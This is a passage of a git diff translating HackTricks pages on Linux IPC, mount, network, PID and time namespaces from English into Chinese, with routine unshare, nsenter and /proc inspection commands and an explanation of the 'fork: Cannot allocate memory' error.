namespace**. Each IPC object is identified by a unique key within its namespace. Although the key may be identical in different namespaces, the objects themselves are isolated and cannot be accessed across namespaces. -3. Processes can move between namespaces using the `setns()` system call or create new namespaces using the `unshare()` or `clone()` system calls with the `CLONE_NEWIPC` flag. When a process moves to a new namespace or creates one, it will start using the IPC objects associated with that namespace. +1. 当创建一个新的IPC命名空间时,它会以**完全隔离的System V IPC对象集**开始。这意味着在新的IPC命名空间中运行的进程默认无法访问或干扰其他命名空间或主机系统中的IPC对象。 +2. 在命名空间内创建的IPC对象仅对**该命名空间内的进程可见和可访问**。每个IPC对象在其命名空间内由唯一的键标识。尽管在不同命名空间中键可能相同,但对象本身是隔离的,无法跨命名空间访问。 +3. 进程可以使用`setns()`系统调用在命名空间之间移动,或使用带有`CLONE_NEWIPC`标志的`unshare()`或`clone()`系统调用创建新的命名空间。当进程移动到新的命名空间或创建一个时,它将开始使用与该命名空间关联的IPC对象。 -## Lab: +## 实验: -### Create different Namespaces +### 创建不同的命名空间 #### CLI - ```bash sudo unshare -i [--mount-proc] /bin/bash ``` - -By mounting a new instance of the `/proc` filesystem if you use the param `--mount-proc`, you ensure that the new mount namespace has an **accurate and isolated view of the process information specific to that namespace**. +通过挂载新的 `/proc` 文件系统实例,如果使用参数 `--mount-proc`,您可以确保新的挂载命名空间具有 **特定于该命名空间的进程信息的准确和隔离的视图**。
-Error: bash: fork: Cannot allocate memory +错误:bash: fork: 无法分配内存 -When `unshare` is executed without the `-f` option, an error is encountered due to the way Linux handles new PID (Process ID) namespaces. The key details and the solution are outlined below: +当 `unshare` 在没有 `-f` 选项的情况下执行时,由于 Linux 处理新的 PID(进程 ID)命名空间的方式,会遇到错误。关键细节和解决方案如下: -1. **Problem Explanation**: +1. **问题解释**: - - The Linux kernel allows a process to create new namespaces using the `unshare` system call. However, the process that initiates the creation of a new PID namespace (referred to as the "unshare" process) does not enter the new namespace; only its child processes do. - - Running `%unshare -p /bin/bash%` starts `/bin/bash` in the same process as `unshare`. Consequently, `/bin/bash` and its child processes are in the original PID namespace. - - The first child process of `/bin/bash` in the new namespace becomes PID 1. When this process exits, it triggers the cleanup of the namespace if there are no other processes, as PID 1 has the special role of adopting orphan processes. The Linux kernel will then disable PID allocation in that namespace. +- Linux 内核允许进程使用 `unshare` 系统调用创建新的命名空间。然而,启动新 PID 命名空间创建的进程(称为 "unshare" 进程)并不会进入新的命名空间;只有它的子进程会进入。 +- 运行 `%unshare -p /bin/bash%` 会在与 `unshare` 相同的进程中启动 `/bin/bash`。因此,`/bin/bash` 及其子进程位于原始 PID 命名空间中。 +- 新命名空间中 `/bin/bash` 的第一个子进程成为 PID 1。当该进程退出时,如果没有其他进程,它会触发命名空间的清理,因为 PID 1 具有收养孤儿进程的特殊角色。然后,Linux 内核将禁用该命名空间中的 PID 分配。 -2. **Consequence**: +2. **后果**: - - The exit of PID 1 in a new namespace leads to the cleaning of the `PIDNS_HASH_ADDING` flag. This results in the `alloc_pid` function failing to allocate a new PID when creating a new process, producing the "Cannot allocate memory" error. +- 新命名空间中 PID 1 的退出导致 `PIDNS_HASH_ADDING` 标志的清理。这导致 `alloc_pid` 函数在创建新进程时无法分配新的 PID,从而产生 "无法分配内存" 错误。 -3. **Solution**: - - The issue can be resolved by using the `-f` option with `unshare`. This option makes `unshare` fork a new process after creating the new PID namespace. - - Executing `%unshare -fp /bin/bash%` ensures that the `unshare` command itself becomes PID 1 in the new namespace. `/bin/bash` and its child processes are then safely contained within this new namespace, preventing the premature exit of PID 1 and allowing normal PID allocation. +3. **解决方案**: +- 通过在 `unshare` 中使用 `-f` 选项可以解决此问题。此选项使 `unshare` 在创建新的 PID 命名空间后分叉一个新进程。 +- 执行 `%unshare -fp /bin/bash%` 确保 `unshare` 命令本身在新命名空间中成为 PID 1。然后,`/bin/bash` 及其子进程安全地包含在这个新命名空间中,防止 PID 1 提前退出,并允许正常的 PID 分配。 -By ensuring that `unshare` runs with the `-f` flag, the new PID namespace is correctly maintained, allowing `/bin/bash` and its sub-processes to operate without encountering the memory allocation error. +通过确保 `unshare` 以 `-f` 标志运行,新的 PID 命名空间得以正确维护,使得 `/bin/bash` 及其子进程能够正常运行,而不会遇到内存分配错误。
#### Docker - ```bash docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash ``` - -### Check which namespace is your process in - +### 检查您的进程所在的命名空间 ```bash ls -l /proc/self/ns/ipc lrwxrwxrwx 1 root root 0 Apr 4 20:37 /proc/self/ns/ipc -> 'ipc:[4026531839]' ``` - -### Find all IPC namespaces - +### 查找所有 IPC 命名空间 ```bash sudo find /proc -maxdepth 3 -type l -name ipc -exec readlink {} \; 2>/dev/null | sort -u # Find the processes with an specific namespace sudo find /proc -maxdepth 3 -type l -name ipc -exec ls -l {} \; 2>/dev/null | grep ``` - -### Enter inside an IPC namespace - +### 进入 IPC 命名空间 ```bash nsenter -i TARGET_PID --pid /bin/bash ``` +此外,您只能**以 root 身份进入另一个进程命名空间**。并且您**不能**在没有指向它的**描述符**的情况下**进入**其他命名空间(例如 `/proc/self/ns/net`)。 -Also, you can only **enter in another process namespace if you are root**. And you **cannot** **enter** in other namespace **without a descriptor** pointing to it (like `/proc/self/ns/net`). - -### Create IPC object - +### 创建 IPC 对象 ```bash # Container sudo unshare -i /bin/bash @@ -93,8 +82,7 @@ key shmid owner perms bytes nattch status # From the host ipcs -m # Nothing is seen ``` - -## References +## 参考 - [https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory](https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory) diff --git a/src/linux-hardening/privilege-escalation/docker-security/namespaces/mount-namespace.md b/src/linux-hardening/privilege-escalation/docker-security/namespaces/mount-namespace.md index 7cdc2cf0d..070481659 100644 --- a/src/linux-hardening/privilege-escalation/docker-security/namespaces/mount-namespace.md +++ b/src/linux-hardening/privilege-escalation/docker-security/namespaces/mount-namespace.md @@ -2,70 +2,63 @@ {{#include ../../../../banners/hacktricks-training.md}} -## Basic Information +## 基本信息 -A mount namespace is a Linux kernel feature that provides isolation of the file system mount points seen by a group of processes. Each mount namespace has its own set of file system mount points, and **changes to the mount points in one namespace do not affect other namespaces**. This means that processes running in different mount namespaces can have different views of the file system hierarchy. +挂载命名空间是一个Linux内核特性,提供了一个进程组所看到的文件系统挂载点的隔离。每个挂载命名空间都有自己的一组文件系统挂载点,**对一个命名空间中挂载点的更改不会影响其他命名空间**。这意味着在不同挂载命名空间中运行的进程可以对文件系统层次结构有不同的视图。 -Mount namespaces are particularly useful in containerization, where each container should have its own file system and configuration, isolated from other containers and the host system. +挂载命名空间在容器化中特别有用,每个容器应该有自己的文件系统和配置,与其他容器和主机系统隔离。 -### How it works: +### 工作原理: -1. When a new mount namespace is created, it is initialized with a **copy of the mount points from its parent namespace**. This means that, at creation, the new namespace shares the same view of the file system as its parent. However, any subsequent changes to the mount points within the namespace will not affect the parent or other namespaces. -2. When a process modifies a mount point within its namespace, such as mounting or unmounting a file system, the **change is local to that namespace** and does not affect other namespaces. This allows each namespace to have its own independent file system hierarchy. -3. Processes can move between namespaces using the `setns()` system call, or create new namespaces using the `unshare()` or `clone()` system calls with the `CLONE_NEWNS` flag. When a process moves to a new namespace or creates one, it will start using the mount points associated with that namespace. -4. **File descriptors and inodes are shared across namespaces**, meaning that if a process in one namespace has an open file descriptor pointing to a file, it can **pass that file descriptor** to a process in another namespace, and **both processes will access the same file**. However, the file's path may not be the same in both namespaces due to differences in mount points. +1. 当创建一个新的挂载命名空间时,它会用**来自其父命名空间的挂载点的副本**进行初始化。这意味着在创建时,新的命名空间与其父命名空间共享相同的文件系统视图。然而,命名空间内对挂载点的任何后续更改不会影响父命名空间或其他命名空间。 +2. 当一个进程在其命名空间内修改挂载点,例如挂载或卸载文件系统时,**更改仅限于该命名空间**,不会影响其他命名空间。这允许每个命名空间拥有自己的独立文件系统层次结构。 +3. 进程可以使用`setns()`系统调用在命名空间之间移动,或使用带有`CLONE_NEWNS`标志的`unshare()`或`clone()`系统调用创建新的命名空间。当一个进程移动到一个新的命名空间或创建一个时,它将开始使用与该命名空间关联的挂载点。 +4. **文件描述符和inode在命名空间之间是共享的**,这意味着如果一个命名空间中的进程有一个指向文件的打开文件描述符,它可以**将该文件描述符传递**给另一个命名空间中的进程,**两个进程将访问同一个文件**。然而,由于挂载点的差异,文件的路径在两个命名空间中可能并不相同。 -## Lab: +## 实验: -### Create different Namespaces +### 创建不同的命名空间 #### CLI - ```bash sudo unshare -m [--mount-proc] /bin/bash ``` - -By mounting a new instance of the `/proc` filesystem if you use the param `--mount-proc`, you ensure that the new mount namespace has an **accurate and isolated view of the process information specific to that namespace**. +通过挂载新的 `/proc` 文件系统实例,如果使用参数 `--mount-proc`,您可以确保新的挂载命名空间具有 **特定于该命名空间的进程信息的准确和隔离的视图**。
-Error: bash: fork: Cannot allocate memory +错误:bash: fork: 无法分配内存 -When `unshare` is executed without the `-f` option, an error is encountered due to the way Linux handles new PID (Process ID) namespaces. The key details and the solution are outlined below: +当 `unshare` 在没有 `-f` 选项的情况下执行时,由于 Linux 处理新的 PID(进程 ID)命名空间的方式,会遇到错误。关键细节和解决方案如下: -1. **Problem Explanation**: +1. **问题解释**: - - The Linux kernel allows a process to create new namespaces using the `unshare` system call. However, the process that initiates the creation of a new PID namespace (referred to as the "unshare" process) does not enter the new namespace; only its child processes do. - - Running `%unshare -p /bin/bash%` starts `/bin/bash` in the same process as `unshare`. Consequently, `/bin/bash` and its child processes are in the original PID namespace. - - The first child process of `/bin/bash` in the new namespace becomes PID 1. When this process exits, it triggers the cleanup of the namespace if there are no other processes, as PID 1 has the special role of adopting orphan processes. The Linux kernel will then disable PID allocation in that namespace. +- Linux 内核允许进程使用 `unshare` 系统调用创建新的命名空间。然而,启动新 PID 命名空间创建的进程(称为 "unshare" 进程)并不会进入新的命名空间;只有它的子进程会进入。 +- 运行 `%unshare -p /bin/bash%` 会在与 `unshare` 相同的进程中启动 `/bin/bash`。因此,`/bin/bash` 及其子进程位于原始 PID 命名空间中。 +- 新命名空间中 `/bin/bash` 的第一个子进程成为 PID 1。当该进程退出时,如果没有其他进程,它会触发命名空间的清理,因为 PID 1 具有收养孤儿进程的特殊角色。然后,Linux 内核将禁用该命名空间中的 PID 分配。 -2. **Consequence**: +2. **后果**: - - The exit of PID 1 in a new namespace leads to the cleaning of the `PIDNS_HASH_ADDING` flag. This results in the `alloc_pid` function failing to allocate a new PID when creating a new process, producing the "Cannot allocate memory" error. +- 新命名空间中 PID 1 的退出导致 `PIDNS_HASH_ADDING` 标志的清理。这导致 `alloc_pid` 函数在创建新进程时无法分配新的 PID,从而产生 "无法分配内存" 的错误。 -3. **Solution**: - - The issue can be resolved by using the `-f` option with `unshare`. This option makes `unshare` fork a new process after creating the new PID namespace. - - Executing `%unshare -fp /bin/bash%` ensures that the `unshare` command itself becomes PID 1 in the new namespace. `/bin/bash` and its child processes are then safely contained within this new namespace, preventing the premature exit of PID 1 and allowing normal PID allocation. +3. **解决方案**: +- 通过在 `unshare` 中使用 `-f` 选项可以解决此问题。此选项使 `unshare` 在创建新的 PID 命名空间后分叉一个新进程。 +- 执行 `%unshare -fp /bin/bash%` 确保 `unshare` 命令本身在新命名空间中成为 PID 1。然后,`/bin/bash` 及其子进程安全地包含在这个新命名空间中,防止 PID 1 提前退出,并允许正常的 PID 分配。 -By ensuring that `unshare` runs with the `-f` flag, the new PID namespace is correctly maintained, allowing `/bin/bash` and its sub-processes to operate without encountering the memory allocation error. +通过确保 `unshare` 以 `-f` 标志运行,新的 PID 命名空间得以正确维护,使得 `/bin/bash` 及其子进程能够正常运行,而不会遇到内存分配错误。
#### Docker - ```bash docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash ``` - -### Check which namespace is your process in - +### 检查您的进程所在的命名空间 ```bash ls -l /proc/self/ns/mnt lrwxrwxrwx 1 root root 0 Apr 4 20:30 /proc/self/ns/mnt -> 'mnt:[4026531841]' ``` - -### Find all Mount namespaces - +### 查找所有挂载命名空间 ```bash sudo find /proc -maxdepth 3 -type l -name mnt -exec readlink {} \; 2>/dev/null | sort -u # Find the processes with an specific namespace @@ -75,19 +68,15 @@ sudo find /proc -maxdepth 3 -type l -name mnt -exec ls -l {} \; 2>/dev/null | g ```bash findmnt ``` - -### Enter inside a Mount namespace - +### 进入一个挂载命名空间 ```bash nsenter -m TARGET_PID --pid /bin/bash ``` +此外,您只能在**根用户**下**进入另一个进程命名空间**。并且您**不能**在没有指向它的**描述符**的情况下**进入**其他命名空间(例如 `/proc/self/ns/mnt`)。 -Also, you can only **enter in another process namespace if you are root**. And you **cannot** **enter** in other namespace **without a descriptor** pointing to it (like `/proc/self/ns/mnt`). - -Because new mounts are only accessible within the namespace it's possible that a namespace contains sensitive information that can only be accessible from it. - -### Mount something +因为新挂载仅在命名空间内可访问,所以命名空间可能包含只能从中访问的敏感信息。 +### 挂载某些内容 ```bash # Generate new mount ns unshare -m /bin/bash @@ -127,8 +116,7 @@ systemd-private-3d87c249e8a84451994ad692609cd4b6-systemd-timesyncd.service-FAnDq vmware-root_662-2689143848 ``` - -## References +## 参考 - [https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory](https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory) - [https://unix.stackexchange.com/questions/464033/understanding-how-mount-namespaces-work-in-linux](https://unix.stackexchange.com/questions/464033/understanding-how-mount-namespaces-work-in-linux) diff --git a/src/linux-hardening/privilege-escalation/docker-security/namespaces/network-namespace.md b/src/linux-hardening/privilege-escalation/docker-security/namespaces/network-namespace.md index 8ab89ce7f..a4147e0ac 100644 --- a/src/linux-hardening/privilege-escalation/docker-security/namespaces/network-namespace.md +++ b/src/linux-hardening/privilege-escalation/docker-security/namespaces/network-namespace.md @@ -1,86 +1,76 @@ -# Network Namespace +# 网络命名空间 {{#include ../../../../banners/hacktricks-training.md}} -## Basic Information +## 基本信息 -A network namespace is a Linux kernel feature that provides isolation of the network stack, allowing **each network namespace to have its own independent network configuration**, interfaces, IP addresses, routing tables, and firewall rules. This isolation is useful in various scenarios, such as containerization, where each container should have its own network configuration, independent of other containers and the host system. +网络命名空间是一个Linux内核特性,提供网络栈的隔离,允许**每个网络命名空间拥有自己的独立网络配置**、接口、IP地址、路由表和防火墙规则。这种隔离在各种场景中非常有用,例如容器化,其中每个容器应具有自己的网络配置,与其他容器和主机系统独立。 -### How it works: +### 工作原理: -1. When a new network namespace is created, it starts with a **completely isolated network stack**, with **no network interfaces** except for the loopback interface (lo). This means that processes running in the new network namespace cannot communicate with processes in other namespaces or the host system by default. -2. **Virtual network interfaces**, such as veth pairs, can be created and moved between network namespaces. This allows for establishing network connectivity between namespaces or between a namespace and the host system. For example, one end of a veth pair can be placed in a container's network namespace, and the other end can be connected to a **bridge** or another network interface in the host namespace, providing network connectivity to the container. -3. Network interfaces within a namespace can have their **own IP addresses, routing tables, and firewall rules**, independent of other namespaces. This allows processes in different network namespaces to have different network configurations and operate as if they are running on separate networked systems. -4. Processes can move between namespaces using the `setns()` system call, or create new namespaces using the `unshare()` or `clone()` system calls with the `CLONE_NEWNET` flag. When a process moves to a new namespace or creates one, it will start using the network configuration and interfaces associated with that namespace. +1. 当创建一个新的网络命名空间时,它将以**完全隔离的网络栈**开始,**没有网络接口**,除了回环接口(lo)。这意味着在新的网络命名空间中运行的进程默认无法与其他命名空间或主机系统中的进程通信。 +2. **虚拟网络接口**,如veth对,可以在网络命名空间之间创建和移动。这允许在命名空间之间或命名空间与主机系统之间建立网络连接。例如,veth对的一端可以放置在容器的网络命名空间中,另一端可以连接到主机命名空间中的**桥接**或其他网络接口,为容器提供网络连接。 +3. 命名空间内的网络接口可以拥有**自己的IP地址、路由表和防火墙规则**,与其他命名空间独立。这允许不同网络命名空间中的进程具有不同的网络配置,并像在独立的网络系统上运行一样操作。 +4. 进程可以使用`setns()`系统调用在命名空间之间移动,或使用带有`CLONE_NEWNET`标志的`unshare()`或`clone()`系统调用创建新的命名空间。当进程移动到新的命名空间或创建一个时,它将开始使用与该命名空间关联的网络配置和接口。 -## Lab: +## 实验: -### Create different Namespaces +### 创建不同的命名空间 #### CLI - ```bash sudo unshare -n [--mount-proc] /bin/bash # Run ifconfig or ip -a ``` - -By mounting a new instance of the `/proc` filesystem if you use the param `--mount-proc`, you ensure that the new mount namespace has an **accurate and isolated view of the process information specific to that namespace**. +通过挂载新的 `/proc` 文件系统,如果使用参数 `--mount-proc`,您可以确保新的挂载命名空间具有 **特定于该命名空间的进程信息的准确和隔离的视图**。
-Error: bash: fork: Cannot allocate memory +错误:bash: fork: 无法分配内存 -When `unshare` is executed without the `-f` option, an error is encountered due to the way Linux handles new PID (Process ID) namespaces. The key details and the solution are outlined below: +当 `unshare` 在没有 `-f` 选项的情况下执行时,由于 Linux 处理新的 PID(进程 ID)命名空间的方式,会遇到错误。关键细节和解决方案如下: -1. **Problem Explanation**: +1. **问题说明**: - - The Linux kernel allows a process to create new namespaces using the `unshare` system call. However, the process that initiates the creation of a new PID namespace (referred to as the "unshare" process) does not enter the new namespace; only its child processes do. - - Running `%unshare -p /bin/bash%` starts `/bin/bash` in the same process as `unshare`. Consequently, `/bin/bash` and its child processes are in the original PID namespace. - - The first child process of `/bin/bash` in the new namespace becomes PID 1. When this process exits, it triggers the cleanup of the namespace if there are no other processes, as PID 1 has the special role of adopting orphan processes. The Linux kernel will then disable PID allocation in that namespace. +- Linux 内核允许进程使用 `unshare` 系统调用创建新的命名空间。然而,启动新 PID 命名空间创建的进程(称为 "unshare" 进程)并不会进入新的命名空间;只有它的子进程会进入。 +- 运行 `%unshare -p /bin/bash%` 会在与 `unshare` 相同的进程中启动 `/bin/bash`。因此,`/bin/bash` 及其子进程位于原始 PID 命名空间中。 +- 新命名空间中 `/bin/bash` 的第一个子进程成为 PID 1。当该进程退出时,如果没有其他进程,它会触发命名空间的清理,因为 PID 1 具有收养孤儿进程的特殊角色。然后,Linux 内核将禁用该命名空间中的 PID 分配。 -2. **Consequence**: +2. **后果**: - - The exit of PID 1 in a new namespace leads to the cleaning of the `PIDNS_HASH_ADDING` flag. This results in the `alloc_pid` function failing to allocate a new PID when creating a new process, producing the "Cannot allocate memory" error. +- 新命名空间中 PID 1 的退出导致 `PIDNS_HASH_ADDING` 标志的清理。这导致 `alloc_pid` 函数在创建新进程时无法分配新的 PID,从而产生 "无法分配内存" 的错误。 -3. **Solution**: - - The issue can be resolved by using the `-f` option with `unshare`. This option makes `unshare` fork a new process after creating the new PID namespace. - - Executing `%unshare -fp /bin/bash%` ensures that the `unshare` command itself becomes PID 1 in the new namespace. `/bin/bash` and its child processes are then safely contained within this new namespace, preventing the premature exit of PID 1 and allowing normal PID allocation. +3. **解决方案**: +- 通过在 `unshare` 中使用 `-f` 选项可以解决此问题。此选项使 `unshare` 在创建新的 PID 命名空间后分叉一个新进程。 +- 执行 `%unshare -fp /bin/bash%` 确保 `unshare` 命令本身在新命名空间中成为 PID 1。`/bin/bash` 及其子进程随后安全地包含在这个新命名空间中,防止 PID 1 的过早退出,并允许正常的 PID 分配。 -By ensuring that `unshare` runs with the `-f` flag, the new PID namespace is correctly maintained, allowing `/bin/bash` and its sub-processes to operate without encountering the memory allocation error. +通过确保 `unshare` 以 `-f` 标志运行,新的 PID 命名空间得以正确维护,允许 `/bin/bash` 及其子进程在不遇到内存分配错误的情况下运行。
#### Docker - ```bash docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash # Run ifconfig or ip -a ``` - -### Check which namespace is your process in - +### 检查您的进程所在的命名空间 ```bash ls -l /proc/self/ns/net lrwxrwxrwx 1 root root 0 Apr 4 20:30 /proc/self/ns/net -> 'net:[4026531840]' ``` - -### Find all Network namespaces - +### 查找所有网络命名空间 ```bash sudo find /proc -maxdepth 3 -type l -name net -exec readlink {} \; 2>/dev/null | sort -u | grep "net:" # Find the processes with an specific namespace sudo find /proc -maxdepth 3 -type l -name net -exec ls -l {} \; 2>/dev/null | grep ``` - -### Enter inside a Network namespace - +### 进入网络命名空间 ```bash nsenter -n TARGET_PID --pid /bin/bash ``` +此外,您只能**以 root 身份进入另一个进程命名空间**。并且您**不能**在没有指向它的**描述符**的情况下**进入**其他命名空间(例如 `/proc/self/ns/net`)。 -Also, you can only **enter in another process namespace if you are root**. And you **cannot** **enter** in other namespace **without a descriptor** pointing to it (like `/proc/self/ns/net`). - -## References +## 参考 - [https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory](https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory) diff --git a/src/linux-hardening/privilege-escalation/docker-security/namespaces/pid-namespace.md b/src/linux-hardening/privilege-escalation/docker-security/namespaces/pid-namespace.md index 0d4297366..25f387e4a 100644 --- a/src/linux-hardening/privilege-escalation/docker-security/namespaces/pid-namespace.md +++ b/src/linux-hardening/privilege-escalation/docker-security/namespaces/pid-namespace.md @@ -2,87 +2,77 @@ {{#include ../../../../banners/hacktricks-training.md}} -## Basic Information +## 基本信息 -The PID (Process IDentifier) namespace is a feature in the Linux kernel that provides process isolation by enabling a group of processes to have their own set of unique PIDs, separate from the PIDs in other namespaces. This is particularly useful in containerization, where process isolation is essential for security and resource management. +PID(进程标识符)命名空间是Linux内核中的一个特性,通过使一组进程拥有自己独特的PID集合,与其他命名空间中的PID分开,从而提供进程隔离。这在容器化中尤为重要,因为进程隔离对于安全性和资源管理至关重要。 -When a new PID namespace is created, the first process in that namespace is assigned PID 1. This process becomes the "init" process of the new namespace and is responsible for managing other processes within the namespace. Each subsequent process created within the namespace will have a unique PID within that namespace, and these PIDs will be independent of PIDs in other namespaces. +当创建一个新的PID命名空间时,该命名空间中的第一个进程被分配PID 1。这个进程成为新命名空间的“init”进程,负责管理该命名空间内的其他进程。在命名空间内创建的每个后续进程将拥有该命名空间内的唯一PID,这些PID将独立于其他命名空间中的PID。 -From the perspective of a process within a PID namespace, it can only see other processes in the same namespace. It is not aware of processes in other namespaces, and it cannot interact with them using traditional process management tools (e.g., `kill`, `wait`, etc.). This provides a level of isolation that helps prevent processes from interfering with one another. +从PID命名空间内进程的角度来看,它只能看到同一命名空间中的其他进程。它无法感知其他命名空间中的进程,也无法使用传统的进程管理工具(例如,`kill`、`wait`等)与它们交互。这提供了一种隔离级别,有助于防止进程相互干扰。 -### How it works: +### 工作原理: -1. When a new process is created (e.g., by using the `clone()` system call), the process can be assigned to a new or existing PID namespace. **If a new namespace is created, the process becomes the "init" process of that namespace**. -2. The **kernel** maintains a **mapping between the PIDs in the new namespace and the corresponding PIDs** in the parent namespace (i.e., the namespace from which the new namespace was created). This mapping **allows the kernel to translate PIDs when necessary**, such as when sending signals between processes in different namespaces. -3. **Processes within a PID namespace can only see and interact with other processes in the same namespace**. They are not aware of processes in other namespaces, and their PIDs are unique within their namespace. -4. When a **PID namespace is destroyed** (e.g., when the "init" process of the namespace exits), **all processes within that namespace are terminated**. This ensures that all resources associated with the namespace are properly cleaned up. +1. 当创建一个新进程时(例如,通过使用`clone()`系统调用),该进程可以被分配到一个新的或现有的PID命名空间。**如果创建了一个新命名空间,该进程将成为该命名空间的“init”进程**。 +2. **内核**维护一个**新命名空间中的PID与父命名空间中相应PID之间的映射**(即,从中创建新命名空间的命名空间)。这个映射**允许内核在必要时翻译PID**,例如在不同命名空间中的进程之间发送信号时。 +3. **PID命名空间内的进程只能看到并与同一命名空间中的其他进程交互**。它们无法感知其他命名空间中的进程,并且它们的PID在其命名空间内是唯一的。 +4. 当**PID命名空间被销毁**(例如,当命名空间的“init”进程退出时),**该命名空间内的所有进程都将被终止**。这确保与命名空间相关的所有资源都得到妥善清理。 -## Lab: +## 实验: -### Create different Namespaces +### 创建不同的命名空间 #### CLI - ```bash sudo unshare -pf --mount-proc /bin/bash ``` -
-Error: bash: fork: Cannot allocate memory +错误:bash: fork: 无法分配内存 -When `unshare` is executed without the `-f` option, an error is encountered due to the way Linux handles new PID (Process ID) namespaces. The key details and the solution are outlined below: +当 `unshare` 在没有 `-f` 选项的情况下执行时,由于 Linux 处理新 PID(进程 ID)命名空间的方式,会遇到错误。关键细节和解决方案如下: -1. **Problem Explanation**: +1. **问题解释**: - - The Linux kernel allows a process to create new namespaces using the `unshare` system call. However, the process that initiates the creation of a new PID namespace (referred to as the "unshare" process) does not enter the new namespace; only its child processes do. - - Running `%unshare -p /bin/bash%` starts `/bin/bash` in the same process as `unshare`. Consequently, `/bin/bash` and its child processes are in the original PID namespace. - - The first child process of `/bin/bash` in the new namespace becomes PID 1. When this process exits, it triggers the cleanup of the namespace if there are no other processes, as PID 1 has the special role of adopting orphan processes. The Linux kernel will then disable PID allocation in that namespace. +- Linux 内核允许一个进程使用 `unshare` 系统调用创建新的命名空间。然而,启动新 PID 命名空间创建的进程(称为 "unshare" 进程)并不会进入新的命名空间;只有它的子进程会进入。 +- 运行 `%unshare -p /bin/bash%` 会在与 `unshare` 相同的进程中启动 `/bin/bash`。因此,`/bin/bash` 及其子进程处于原始 PID 命名空间中。 +- 新命名空间中 `/bin/bash` 的第一个子进程成为 PID 1。当该进程退出时,如果没有其他进程,它会触发命名空间的清理,因为 PID 1 具有收养孤儿进程的特殊角色。然后,Linux 内核将禁用该命名空间中的 PID 分配。 -2. **Consequence**: +2. **后果**: - - The exit of PID 1 in a new namespace leads to the cleaning of the `PIDNS_HASH_ADDING` flag. This results in the `alloc_pid` function failing to allocate a new PID when creating a new process, producing the "Cannot allocate memory" error. +- 新命名空间中 PID 1 的退出导致 `PIDNS_HASH_ADDING` 标志的清理。这导致 `alloc_pid` 函数在创建新进程时无法分配新的 PID,从而产生 "无法分配内存" 的错误。 -3. **Solution**: - - The issue can be resolved by using the `-f` option with `unshare`. This option makes `unshare` fork a new process after creating the new PID namespace. - - Executing `%unshare -fp /bin/bash%` ensures that the `unshare` command itself becomes PID 1 in the new namespace. `/bin/bash` and its child processes are then safely contained within this new namespace, preventing the premature exit of PID 1 and allowing normal PID allocation. +3. **解决方案**: +- 通过在 `unshare` 中使用 `-f` 选项可以解决此问题。此选项使 `unshare` 在创建新 PID 命名空间后分叉一个新进程。 +- 执行 `%unshare -fp /bin/bash%` 确保 `unshare` 命令本身在新命名空间中成为 PID 1。`/bin/bash` 及其子进程随后安全地包含在这个新命名空间中,防止 PID 1 提前退出,并允许正常的 PID 分配。 -By ensuring that `unshare` runs with the `-f` flag, the new PID namespace is correctly maintained, allowing `/bin/bash` and its sub-processes to operate without encountering the memory allocation error. +通过确保 `unshare` 以 `-f` 标志运行,新的 PID 命名空间得以正确维护,使得 `/bin/bash` 及其子进程能够正常运行而不会遇到内存分配错误。
-By mounting a new instance of the `/proc` filesystem if you use the param `--mount-proc`, you ensure that the new mount namespace has an **accurate and isolated view of the process information specific to that namespace**. +通过挂载新的 `/proc` 文件系统实例,如果使用参数 `--mount-proc`,您可以确保新的挂载命名空间具有 **特定于该命名空间的进程信息的准确和隔离视图**。 #### Docker - ```bash docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash ``` - -### Check which namespace are your process in - +### 检查您的进程所在的命名空间 ```bash ls -l /proc/self/ns/pid lrwxrwxrwx 1 root root 0 Apr 3 18:45 /proc/self/ns/pid -> 'pid:[4026532412]' ``` - -### Find all PID namespaces - +### 查找所有 PID 命名空间 ```bash sudo find /proc -maxdepth 3 -type l -name pid -exec readlink {} \; 2>/dev/null | sort -u ``` +请注意,初始(默认)PID 命名空间中的 root 用户可以看到所有进程,包括新 PID 命名空间中的进程,这就是我们可以看到所有 PID 命名空间的原因。 -Note that the root use from the initial (default) PID namespace can see all the processes, even the ones in new PID names paces, thats why we can see all the PID namespaces. - -### Enter inside a PID namespace - +### 进入 PID 命名空间 ```bash nsenter -t TARGET_PID --pid /bin/bash ``` +当你从默认命名空间进入一个 PID 命名空间时,你仍然能够看到所有的进程。而来自该 PID 命名空间的进程将能够看到 PID 命名空间中的新 bash。 -When you enter inside a PID namespace from the default namespace, you will still be able to see all the processes. And the process from that PID ns will be able to see the new bash on the PID ns. - -Also, you can only **enter in another process PID namespace if you are root**. And you **cannot** **enter** in other namespace **without a descriptor** pointing to it (like `/proc/self/ns/pid`) +此外,你只能 **在你是 root 的情况下进入另一个进程的 PID 命名空间**。并且你 **不能** **进入** 其他命名空间 **而没有指向它的描述符**(如 `/proc/self/ns/pid`) ## References diff --git a/src/linux-hardening/privilege-escalation/docker-security/namespaces/time-namespace.md b/src/linux-hardening/privilege-escalation/docker-security/namespaces/time-namespace.md index 5d2201886..5c5aa0b97 100644 --- a/src/linux-hardening/privilege-escalation/docker-security/namespaces/time-namespace.md +++ b/src/linux-hardening/privilege-escalation/docker-security/namespaces/time-namespace.md @@ -1,72 +1,62 @@ -# Time Namespace +# 时间命名空间 {{#include ../../../../banners/hacktricks-training.md}} -## Basic Information +## 基本信息 -The time namespace in Linux allows for per-namespace offsets to the system monotonic and boot-time clocks. It is commonly used in Linux containers to change the date/time within a container and adjust clocks after restoring from a checkpoint or snapshot. +Linux中的时间命名空间允许对系统单调时钟和启动时间时钟进行每个命名空间的偏移。它通常用于Linux容器中,以更改容器内的日期/时间,并在从检查点或快照恢复后调整时钟。 -## Lab: +## 实验: -### Create different Namespaces +### 创建不同的命名空间 #### CLI - ```bash sudo unshare -T [--mount-proc] /bin/bash ``` - -By mounting a new instance of the `/proc` filesystem if you use the param `--mount-proc`, you ensure that the new mount namespace has an **accurate and isolated view of the process information specific to that namespace**. +通过挂载新的 `/proc` 文件系统实例,如果使用参数 `--mount-proc`,您可以确保新的挂载命名空间具有 